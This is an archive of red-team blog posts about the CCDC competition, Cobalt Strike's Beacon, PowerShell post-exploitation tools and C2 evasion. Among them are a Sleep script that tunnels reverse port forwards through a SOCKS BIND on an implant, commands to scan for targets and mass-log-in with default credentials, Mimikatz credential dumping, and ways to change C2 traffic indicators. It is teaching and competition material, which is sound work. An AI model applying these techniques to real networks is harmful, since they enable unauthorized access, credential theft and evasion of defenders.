Archive for the ‘Red Team’ Category

h1

So, you won a regional and you’re headed to National CCDC

April 17, 2015

The 2015 National CCDC season started with 100+ teams across 10 regions. Now, there are 10 teams left and they’re headed to the National CCDC event next week. If you’re on one of those student teams, this blog post is for you. I’d like to take you inside the red team room and give you my perspective on what you can expect and some ideas that may help you win.

The stakes at National CCDC are high. Last year’s winning team, University of Central Florida, had their picture posted in Times Square.

They were also personally congratulated by Vice President Joe Biden at the White House in Washington, DC. This is a big honor and it’s evidence of how prominent the CCDC event is becoming.

vpcomp

With all of that motivational stuff out of the way, let’s jump into the event specifics.

The Opening Salvo

Your National CCDC experience will start on a comfortable San Antonio, TX day. During my years at National CCDC, the blue teams always receive a clean network.

This network stays clean for about five seconds. The red team gets permission to attack at the same time you get permission to touch your systems. We sit in the red team room and wait until our Team Captain tells us Go! Once that happens, we press enter and a script attacks and backdoors your networks six ways to Sunday.

Each year, that I’ve participated in National CCDC, it’s happened this way. There’s nothing you can do about it. The fact that the red team “got in” with default credentials and easy vulnerabilities in the first few minutes is not in your control. It also happens to everyone evenly. When I’m the guy running those scripts, I make it my first priority to verify that every team is hooked the same way before I move on to anything else. Keeping things fair is a priority for myself and everyone else I’ve worked with at National CCDC.

Your Network

Each regional event is different, so I’d like to take a moment to describe the network you will defend at National CCDC. [Keep in mind, all of this is subject to change. I have no insider knowledge of the 2015 National CCDC event. I’m giving you what I and return competitors know.]

First, you will defend a network with a variety of operating systems. Expect a 50/50 mix of Windows and UNIX systems. If I had to venture a guess, I suspect you will see an even mix of dated operating systems and modern ones. Likely, these systems will be part of an Active Directory domain.

At your regional, you probably defended one network. At past National CCDC events, your peers had to defend two networks. One network is setup to act as your local site, in accordance with the scenario. The other network is a “cloud” site and you have to control and defend these systems with remote administration tools.

The makeup of operating systems in the two networks is usually similar.

I’m a fan of the cloud network. I see many blue teams use defense tactics that don’t scale well. The local network and cloud networks, combined, are still a small network. Even so, these extra remote systems are enough to stress the blue teams. Each year, I see most teams protect their internal network relatively well, but struggle in big ways with the cloud network. The top teams get both of these networks under control.

The National CCDC Red Team

The National CCDC red team organizes itself into cells of two to three red teamers per blue team. You may think this is unfair and you may have concerns that the red teamers you get will affect your chances of winning. Don’t worry about this. A lot of effort goes into making this construct fair.

First, the assignment of which red teamers will work together is carefully thought out. Each cell lead is someone who proved themselves at a previous year’s National CCDC event. While we each have specialties (I do a lot more Windows); the expectation is that each lead could handle a blue team by themselves, if necessary.

Second, the initial “malware drop” is scripted across all teams. You and your peers will get the same pile of malware [and configuration changes] to deal with.

Different cells will favor different toolsets, but the National CCDC red team is good at handing off accesses. If one cell loses access with their favored toolset, they have the shell sherpas (red teamers who manage the persistent malware) let them back in. No cell is kicked out of a network until you defeat or get rid of all the malware in your network.

Tempo and Timeline

On the first day, the National CCDC red team is expected to stay silent. In past years, the standing order is to do nothing to give away our presence. The goal is to get you to think we’re the worst red team ever and that there is no red team presence in your network. There’s a reason for this plan. The National CCDC red team wants you to action your injects, snapshot your work, and build up an environment that you’re invested into and trust.

On the second day, your red cell will destroy every system they have access to. You may opt to revert to a snapshot. If you do, the red team’s persistent backdoors will call home. The red team will destroy the system again. This dance will go on for about four hours.

What can you do to escape this?

There are a few options. First, you can revert to a base snapshot from before the event. You’ll lose all of your work and you’ll be vulnerable to the red team trying default things again. If it’s not going to cost you accrued points, I would take the risk and try to get your network up and running as quickly as possible. Red Team is fast, but I have yet to work with one that was really good at re-exploitation of default things in a timely manner. We’re too busy.

Your other option is to analyze network traffic, figure out how the red team is communicating with your systems and block it. We don’t typically use pre-implanted time bombs to destroy your systems. If we can’t talk to a system or it can’t talk to us, we probably can’t affect it.

Tools, Techniques, and Procedures

A common question to the red team is, what tools did you use? Each cell will conduct post-exploitation with what they have the most comfort with. Some cells use the Metasploit Framework for post-exploitation. Others take advantage of Cobalt Strike and its Beacon payload. Some red teamers operate with their private tools. This was the case with Brady Bloxham from Silent Break Security last year. I’ve even seen Core Impact make an appearance at National CCDC here and there.

The post-exploitation toolset is usually different from the persistence toolset. Like a real attacker, the National CCDC red team wants to stay in your network, and they take several precautions to limit your opportunity to observe their persistent backdoors.

The red team will use a variety of public and custom tools to persist in your network. These tools will beacon out of your network in a variety of ways. Their purpose isn’t post-exploitation. These tools are a lifeline. If the red team gets kicked out of your network, they will task one of these tools to let them back in with their preferred tool.

It’s common to see blue teams stuck in a whack-a-mole mindset. They see Meterpreter, Poison Ivy, or something else that’s noisy and obvious. They kill it. Five minutes later the attacker’s back. This isn’t because the attacker re-exploited their system. It’s because the defender took action against the attacker before they understood how the attacker was getting back in. If you don’t defeat an attacker’s persistence or their command and control–you accomplish very little by knocking out their loud post-exploitation agent.

I’ll offer one caveat to the above… you don’t know when your red cell is on their last shell in your network. If you see something obvious, feel free to kick it out. Maybe it’s the last thing you need to do send your red cell packing. Some teams reach this nirvana state.

For post-exploitation, the red team will use direct outbound TCP connections if they can get away with it. They will also use HTTP and HTTPS as data channels. In rare instances, we will use DNS, but only if we have to.

Expect that we will have infrastructure for post-exploitation and persistence within the competition environment and out on the internet. I’m known to take heavy advantage of Amazon’s Elastic Computing Cloud during CCDC. I also know one blue team likes to block all of EC2’s IP ranges. I think this is kind of silly, but we do put infrastructure in other places too.

For persistence, expect all kinds of things and expect this to get painful. Expect that the red team will use custom and public tools to slowly call back to them over DNS and HTTP. Again, the red team will have infrastructure locally and in the cloud.

Last year, one of the red team members brought a backdoor that would try multiple ways to get out of your network. It would try a TCP direct connection, HTTP, DNS, and if those failed it would scrape a shared Google Docs file for instructions.

How to Defeat the Red Team

I’m sharing all of this for a reason. I’ve seen some teams get fixated on a specific toolset. They take steps to defeat the Metasploit Framework. Some take steps to defeat Cobalt Strike’s Beacon payload. Others take steps to defeat things we don’t even use.

If you fixate on one specific toolset, you will put yourself at a major disadvantage. If you want to slow down the red team at National CCDC you’re going to have to fall back to generic best practices that defeat whole classes of bad guy activity.

Let’s go through some of the defense practices I see at CCDC…

EMET

I’ve seen many teams install EMET as part of their standard system hardening. I’ve never understood this and I’ve never felt any pain from it. The red team gains most of its accesses in the first five minutes before you have a chance to do much about it. After that, we’re not doing much in the way of memory corruption exploits. Our malware is on your system and we’re just hanging out and doing bad things with it.

Anti-virus Products

Most teams install an anti-virus product or malware scanner. You’re welcome to install one of these products, if you feel there’s nothing more important to do. You may get lucky and catch some off-the-shelf malware with one of these products. In general though, the National CCDC red team uses custom tools and artifacts. I wouldn’t expect much from an anti-virus product.

Hunting for Malware

All blue teams use the Sysinternals Suite from Microsoft to find red team activity. This requires constant vigilance with TCPView and Process Explorer. Sometimes, a team will get lucky and they’ll see something that directs them to the process we live in. If you see SYSTEM processes spawning new processes (especially cmd.exe), that’s probably bad.

I’ll add one caveat to this–a lot of red team post-exploitation activity happens in an asynchronous way. We queue up our tasks, our payload downloads them with one request, executes them, and reports the results. After that, our payload disconnects from our command and control server and there’s nothing for you to see until it wakes up and connects to us again. All of this happens very quickly and if you blink, you might miss it.

Fighting the red team off of your systems, one process at a time, isn’t going to work over the long term. It’s fine to kick the red team out when you see them, but remember–if you don’t get rid of all of the persistence, you didn’t get rid of the red team.

Restrict Egress

So, what’s the winning strategy? If you want to hurt the red team, you need to make it hard for the malware in your network to talk to the red team. Anything you can do to restrict egress will inflict great amounts of pain on the red team.

There’s a balance here. In a real enterprise, you have to make sure your users can do their job and that the business can functions. In the CCDC events, you have to make sure the scorebot can communicate and you have to satisfy the Orange team.

Make sure you whitelist which outbound ports are allowed. If there’s no need for your network to initiate outbound connections on port 4444, you shouldn’t allow it. Ideally, you should figure out what has to connect out and allow only these things. The National CCDC red team shouldn’t be allowed to control your network with an arbitrary outbound TCP connection.

Proxy Servers

Once you restrict outbound connections, you should force all web traffic to go through a proxy server.

In many cases, the Red Team’s HTTP/S persistent agents will run as SYSTEM. If you put in place an authenticated proxy and make it the only way out, you will prevent this malware from ever leaving your network. If our persistent agents can’t communicate with us, we can’t get back into your network and do bad things to it.

I won’t give away any team’s secret sauce here, but I’ve seen blue teams do creative and legitimate things with proxy servers. You can do a lot with a proxy to restrict malware from getting out of your network without impacting users.

DNS Egress

If you do all of the above well, then the next common channel is DNS. There are misconceptions about how this channel works. If your plan is to block port 53 outbound for all systems, except your internal DNS server, you may want to read this blog post.

Your best bet during CCDC is to detect malicious DNS and block it. Detecting isn’t too bad. Configure a sensor to log all DNS queries and sort this log to see which domains have the most activity. The malicious ones in a CCDC event should bubble to the top.

If you have time and want to put in the effort, you can re-architect your network to isolate internal workstations and servers from the global DNS system. If a workstation needs to browse to a website, let the proxy server handle the DNS resolution for it.

Other Egress

All of the above will make life very painful for the red team. I don’t have a good solution to defeat a red team that uses Google Docs or Twitter for command and control. The best I can offer is this: the more you box the red team in and take away options, the harder you make it for them to do things to you. Even if you can’t defeat all things within the realm of possible, you can slow the red team down a lot, and in a competition–this is good enough to get ahead of your peers.

The Dirtiest of Red Team Tricks

You’ll recall that I mentioned the red team is organized into cells. Each cell is focused on one team. In the red team room, no one wants their blue cell to win. You should expect that your red cell will do everything within their power to take points away from you. When a red cell steals a database with lots of PII that costs points–every other red cell drops what they’re doing and goes after the same data.

Once we exhaust the data that we can steal, we do everything we can to make it so the scorebot can not reach your services. We don’t necessarily need access to all of your systems to inflict great pain either. In previous years, we’ve used static ARP entries and ARP poisoning to good effect to create hard to track down layer-2 issues. We’ll also go the old fashioned route and just stop your scored services and delete files that are critical to their operation.

Closing Thoughts

You may read this post and think, wow, those red team folks are mean. That’s really not the case. We’re volunteers who care about your success. If you won a regional, we feel you can handle a great challenge and we want to make sure we give you one.

One of my favorite parts about National CCDC is the interaction I get to have with my blue team. Because the National CCDC red team splits up by team, you’ll find that your red cell has very detailed feedback for you. Once the event is over, I recommend that you track down your red cell and extract as much information from them as you can. You’ll find that your red cell are eager to share what they did, give you advice, AND to learn from you. I participate in CCDC because each year, I see things that impress me and I learn things that make me think about offense and defense in different ways.

I hope you get the most out of your National CCDC experience. I also hope this blog post helps level the playing fields for those of you coming to the event for the first time.

Good luck and do your best!

h1

Reverse Port Forward through a SOCKS Proxy

April 2, 2015

I had a friend come to me with an interesting problem. He had to get a server to make an outbound connection and evade some pretty tough egress restrictions. Egress is a problem I care a lot about [1, 2, 3]. Beacon is a working option for his Windows systems. Unfortunately, the server in question was UNIX-based. He asked if there were a way to make the UNIX system tunnel through Beacon to make its outbound connection.

reversesocks

The first option is to look at Covert VPN. This is a Cobalt Strike technology to make a layer-2 connection into a target environment. You get an IP address that other systems can connect to and interact with. Once you have a presence in the environment, it’s possible to use native tools to setup a port forward.

I like Covert VPN, but it’s a heavy solution and depending on latency and the layer-2 controls on the pivot network, it may not make sense for a given situation. His situation required him to tunnel Covert VPN through Meterpreter, which he had to tunnel through Beacon, which was calling back to him through multiple redirectors. For this situation, I advised against Covert VPN.

So, what else can one do?

Beacon has a full implementation of the SOCKS4a protocol. Most folks associate SOCKS with outbound connections only. Did you know, it’s also possible to use SOCKS for inbound connections as well?

The SOCKS specification has a BIND command. This command creates a listening socket on the far end and binds it to a specific port. It then waits for someone to connect before it returns an acknowledgement to the SOCKS client. The BIND command was made to enable FTP data transfer to work over a SOCKS proxy.

For intellectual curiosity and to help my friend out, I wondered if we could abuse this BIND option to create a reverse port forward through a Beacon.

A lot of hackers whip out Python or Ruby for these one-off situations. Good, bad, or indifferent, I work in my Sleep language when I need to accomplish a task like this. Here’s the POC I hacked together to do a reverse port forward through a Beacon SOCKS proxy:

# reverse port forward via SOCKS BIND
#
# java -jar sleep.jar relay.sl SOCKS_HOST SOCKS_PORT forward_host forward_port

debug(7 | 34);

# relay traffic from one connection to another
sub relay {
	local('$fromh $toh $data $check $last');
	($fromh, $toh) = @_;
	$last = ticks();
	while (!-eof $fromh) {
		$check = available($fromh);

		# if there's data available.. use it.
		if ($check > 0) {
			$data = readb($fromh, $check);
			writeb($toh, $data);
			$last = ticks();
		}
		# time out this relay if no data in past 2 minutes.
		else if ((ticks() - $last) > 120000) {
			break;
		}
		# sleep for 10ms if nothing to do.
		else {
			sleep(10);
		}
	}

	# clean up!
	closef($fromh);
	closef($toh);
} 

# function to start our relay
sub start {
	local('$handle $fhost $fport $ohandle');
	($handle, $fhost, $fport) = @_;

	# connect to our desired portforward place
	$ohandle = connect($fhost, $fport);

	# create a thread to read from our socket and send to our forward socket
	fork({
		relay($handle, $ohandle);
	}, \$handle, \$ohandle);

	# read from our forward socket and send to our original socket
	relay($ohandle, $handle);
}

# parse command line arguments
global('$phost $pport $fhost $fport $handle $vn $cd $dstport $dstip');
($phost, $pport, $fhost, $fport) = @ARGV;

# connect to SOCKS4 proxy server.
$handle = connect($phost, $pport);

# issue the "bind to whatever and wait for a connection message"
writeb($handle, pack("BBSIB", 4, 2, $fport, 0xFFFFFFFFL, 0));

# read a message, indicating we're connected
($vn, $cd, $dstport, $dstip) = bread($handle, "BBSI");
if ($cd == 90) {
	println("We have a client!");
	start($handle, $fhost, $fport);
}
else {
	println("Failed: $cd");
}

To use this script, you’ll want to create a SOCKS proxy server in Beacon and task Beacon to checkin multiple times each second (interactive mode):

socks 1234
sleep 0

To run this script, you’ll need to download sleep.jar. This script accepts four parameters. The first two are the host and port of the Beacon SOCKS proxy server. The second two are the host and port you want Cobalt Strike to forward the connection to. This second port is the same port the pivot system will wait for connections on.

java -jar sleep.jar relay.sl SOCKS_HOST SOCKS_PORT forward_host forward_port

Example:

java -jar sleep.jar relay.sl 127.0.0.1 1234 192.168.95.190 22

The above example connects to the Beacon SOCKS proxy at 127.0.0.1:1234. It creates a listening socket on the pivot host on port 22. When a connection hits that socket, the relay script connects to 192.168.95.190:22 and relays data between the two connections.

This script works and it demonstrates that reverse port forwards through Beacon are possible. I haven’t tested this elsewhere, but in theory, this same script should yield reverse port forwards for other SOCKS implementations.

Be aware that the BIND option in SOCKS is designed to wait for and forward one connection only. Once a client connects to the pivot host, the listening socket is tore down.

I’ve long understood the value of reverse port forwards. Cobalt Strike has pivot listeners to expose the Metasploit Framework’s ability to relay payload connections through a pivot host. My roadmap for Cobalt Strike 3.0 calls for a turn-key way to use reverse port forwards through Beacon.

My dream is to have a Beacon on a target system inside of an environment and to allow Beacons and other agents to call back to me through this pivot host and to host my malicious goodies through this trusted pivot host. For those of us interested in adversary simulations, this is a beautiful future. Almost as beautiful of a dream as a Washington, DC February spent in Puerto Rico. Almost.

There’s a lot of user experience work and other things to sort out before either dream becomes reality. In the mean time, the base mechanism is there.

If none of this makes sense, here’s an updated diagram to clarify:

reversesocksexplained

h1

Training Recommendations for Threat Emulation and Red Teaming

March 26, 2015

A few weeks ago, I had someone write and ask which training courses I would recommend to help setup a successful Red Team program. If you find yourself asking this question, you may find this post valuable.

First things first, you’ll want to define the goals of your red team and what value it’s going to offer to your organization. Some private sector internal red teams do a variety of offensive tasks and work like an internal consulting shop to their parent organization. If you think this is you, please don’t ignore some of the tasks that may fall on your plate such as reviewing web applications and evaluating different systems for vulnerabilities/bad configuration before they’re added to your environment. I don’t do much with this side of red team activity and my recommendations will show this gap.

When I think about red teaming, I think about it from the standpoint of an aggressor squad, a team that emulates a sophisticated adversary’s process closely to look at security operations from a holistic standpoint not just a vulnerability/patch management.

I see several private sector red teams moving towards something like Microsoft’s model. Microsoft uses one of their red teams to constantly exercise their post-breach security posture and demonstrate a measurable improvement to their intrusion response over time. Their white paper covers their process and their metrics very well.

If the above describes you, here are the courses I’d go for when building out a team:

1. I’d have everyone work to get the OSCP certification. The offsec courses are good fundamental knowledge every offensive operator should know.

2. Veris Group’s Adaptive Threat Division teaches an Adaptive Red Team Tactics course and they’ll come to your organization to teach it. The Veris Group’s red team class focuses on data mining, abusing active directory, and taking advantage of trust relationships in very large Windows enterprises.

This talk is a good flavor for how the Veris folks think:

Veris Group is teaching Adaptive Red Team Tactics and their Adaptive Penetration Testing courses at Black Hat USA 2015.

3. Silent Break Security teaches a course called Dark Side Ops: Custom Penetration Testing. Silent Break sells primarily full scope pen tests and their selling point to customers is they use custom tools to emulate a modern adversary.

This course is the intersection of malware development and red team tradecraft. They give you their custom tools and put you through 15 labs on how to modify and extend their custom tools with new capability. Their process is dead on in-parallel with how I see full scope operations [1, 2].

I reviewed their December 2014 course. Silent Break Security is teaching Dark Side Ops: Custom Penetration Testing at Black Hat USA 2015.

4. I’d also consider putting your money on anything from Attack Research. I plan to eventually take their Tactical Exploitation course. Their Meta-Phish paper from 2009 had more influence on how I think about offense than anything else I’ve read. I have friends who’ve taken their courses and they say they’re excellent.

Tactical Exploitation

MetaPhish

Tactical Exploitation is available at BlackHat USA 2015 as well.

5. I’d invest in a PowerShell skillset and take a course or two along these lines. Most of the high-end red teams I see have bought into PowerShell full-bore for post-exploitation. As a vendor and non-PowerShell developer, I had to embrace PowerShell, or watch my customers move ahead without me. They’re going this way for good reason though. Using native tools for post-ex will give you more power with less opportunity for detection than any other approach. I don’t know of a specific course to point you to here. Carlos Perez (DarkOperator) teaches a PowerShell for Hackers course at DerbyCon and it gets very good reviews.

6. If you’re interested in Cobalt Strike, I do offer the Advanced Threat Tactics course. My course is primarily a developer’s perspective on the Cobalt Strike product. This course is similar to the Tradecraft course except it includes labs, an exercise, and it’s up to date with the latest Cobalt Strike capabilities.

h1

The First Five Minutes

March 19, 2015

March and April are CCDC season. This is the time of the year when teams of college students get to compete against each other as they operate and defend a representative enterprise network from a professional red team.

CCDC events are the most interesting for the blue teams and red teams when the red team plays the role of an embedded attacker. Getting embedded into student networks doesn’t come for free though. Most CCDC events do not allow the red team to touch the networks before the students do. Often times, the students and the red team get access to the networks at the same time. Here’s a clip from one of the regional events last year:

Once the event starts, the first minutes are critical. To ensure a good competition, the red team needs to discover the vulnerable systems (or find out the default credentials), get access to these systems, and install persistence on them. These actions have to happen across 10+ networks and they have to happen before the student teams take their vulnerable systems off of the network for hardening.

I’ve seen events where the above goes off without a hitch. I’ve seen events where disaster struck right away. Last year at National CCDC, the hotel staff plugged a mini-fridge into the red team’s circuit at the start of the event. We lost all power and had a good five to ten minute setback because of it.

I’ve also seen scripts fail causing each individual red team member to scramble, gain what access they can, and try to persist or do anything they possibly can in those critical minutes.

I used to rely on scripts to scan for systems, exploit them, and install persistence. Sometimes these scripts would work great. Other times I’d miss a detail and squander the precious starting minutes troubleshooting the script. Now, I do many things by hand, but still try to stay efficient.

Here’s my process:

To quickly discover interesting hosts in a CCDC event, I run an nmap scan for two ports: 445 and 22. I setup my command to run this scan and wait until the red team lead yells go to press enter.

db_nmap -sV -O -T4 -p 22,445 [student ranges here]

Once the scan completes, the Metasploit Framework will import the results into its database. In Cobalt Strike, these hosts will show in the target area at the top of the tool. I almost always work with the table view at a CCDC event. To do this, go to Cobalt Strike -> Set Target View -> Table View.

From the table view, I can sort my discovered hosts by any of the columns. The far left column is the operating system icon. If you sort by this column, you will find that like-operating systems are now sorted together. This makes mass exploitation, without a script, rather easy.

To mass exploit the UNIX systems, I simply highlight all like UNIX systems in the interface. I right-click, go to Login -> SSH. I then put in what I think are the default credentials. The launch button will launch the Metasploit Framework’s ssh_login module against all highlighted hosts.

One pro-tip: hold down shift when you click Launch. Cobalt Strike will keep the dialog open allowing you to quickly try another username and password combination. I repeat this process until something works.

To mass exploit Windows systems, I do the same thing, except I use psexec to get my Windows accesses. When you launch psexec in Cobalt Strike, I recommend that you set it up to deliver a Beacon payload. This is Cobalt Strike’s asynchronous payload and it’s very resilient to network latency and other interruptions. You will have no shortage of either of these in the beginning of a CCDC event.

Now at this point, you should have access to some Windows and UNIX systems on all teams. The next task is to lay down persistence on these systems. This is the part I script with Cortana.

UNIX systems are easy to work with in Cortana. Cortana provides functions to issue commands and upload files through a shell. When I built these functions, I did my best to make sure each command happens in order before proceeding on to the next step. UNIX persistence scripted with these commands tends to work reliably. To build UNIX persistence scripts and backdoor droppers, I borrow heavily from int128’s infect.cna script.

What about Windows persistence? This is a sad tale of woe. In 2012 and 2013, I would use Cortana to script my Windows persistence through Meterpreter. Last year, Meterpreter would consistently crash when I issued all of my persistence commands to it. Stuck in a pickle, I put together an emergency API to automate a few things in Beacon. This API isn’t a substitute for a real Beacon scripting API (it’s coming!), but it worked in a pinch.

This emergency API allows a script to task Beacon to execute commands, upload files, and timestomp files. Beacon executes each of its task in one thread and it doesn’t move on to the next task until the previous task has had reasonable time to complete. This makes it easy to build a very reliable persistence script through Beacon. I wrote a blog post on this emergency API two weeks ago.

Another key to success is good infrastructure. I never know what to expect at a CCDC event. If the event is isolated from the internet, I make do with binding multiple IP addresses to my team server Linux boxes in red space. If the competition systems have internet access, I leverage Amazon’s EC2 quite heavily. I’ve seen some teams, knowing this factoid, block all of Amazon’s space. I think this is outside the spirit of the competition, but that’s white cell’s call and not mine. When I setup infrastructure in EC2, I tend to follow the team server organization scheme described in my infrastructure for on-going red team operations post.

And, that’s the process I use. If you’re curious about what the first hour looks like on my end, here’s my screen recording from RIT SPARSA’s ISTS event two weeks ago. In it, you’ll see the opening salvo and then my process to account for accesses, fix my scripts on the fly, and work to get into systems that I wasn’t able to get access to initially.

I’ll close this blog post with one question: should it be this way? CCDC and other events like it usually give students dated operating systems to allow the red team an easy foothold. Outside of this community, I’ve seen events where blue players defend larger networks with modern operating systems and pre-existing defenses in place. In these scenarios, the red team pre-seeds their access or relies on a click from a “user” who has access to the target’s environment. We use the access we have to play the role of an embedded attacker and execute actions or capture flags that satisfy blue training requirements. The blue teams work to detect, understand, and mitigate our activity. These types of games exercise blue team work, technical skills, and analysis in a security operations context. When I think about how I’d like to see CCDC evolve, this is a model I’m favorable to. What’s the right way forward? I’m not certain, but so long as CCDC and events like it continue to motivate students to practice critical security skills, I’m happy to work with the current model.

h1

My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

beaconpowershell

PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers some helpful cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.

PowerView

Last in my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. This has become one of my first network reconnaissance tools and it has eliminated a need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.

h1

Another Night, Another Actor

February 19, 2015

Earlier last year, I had a frantic call from a customer. They needed to make a small change to Beacon’s communication pattern and quickly. This customer was asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, this network defense team was able to zero in on Cobalt Strike’s Beacon and they were having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is at direct odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML you’re welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.

h1

DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

I released Beacon in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.

dnscomms2

The above is not easy to detect. I’ve had folks tell me that they see this behavior in production. One A record request every 24-hours or week is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has their purpose and I allow the user to switch back and forth between them for each deployed DNS Beacon.

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4-bytes at a time. If the system can Beacon to me, then I have some option to control it. The A record data channel isn’t efficient, but it works in a pinch.

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2012. I built these capabilities into Beacon to keep with an offense in depth philosophy. If I can’t get out of a network on any channel, except DNS, I need a way to continue to work. I saw pivoting as essential to this and so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time–it’s stealthy. As a data channel, it’s useful when there are no other options. Which option makes sense will depend on your context. The ability to rationalize context to tool comes from mature tradecraft.

Follow

Get every new post delivered to your Inbox.

Join 15,329 other followers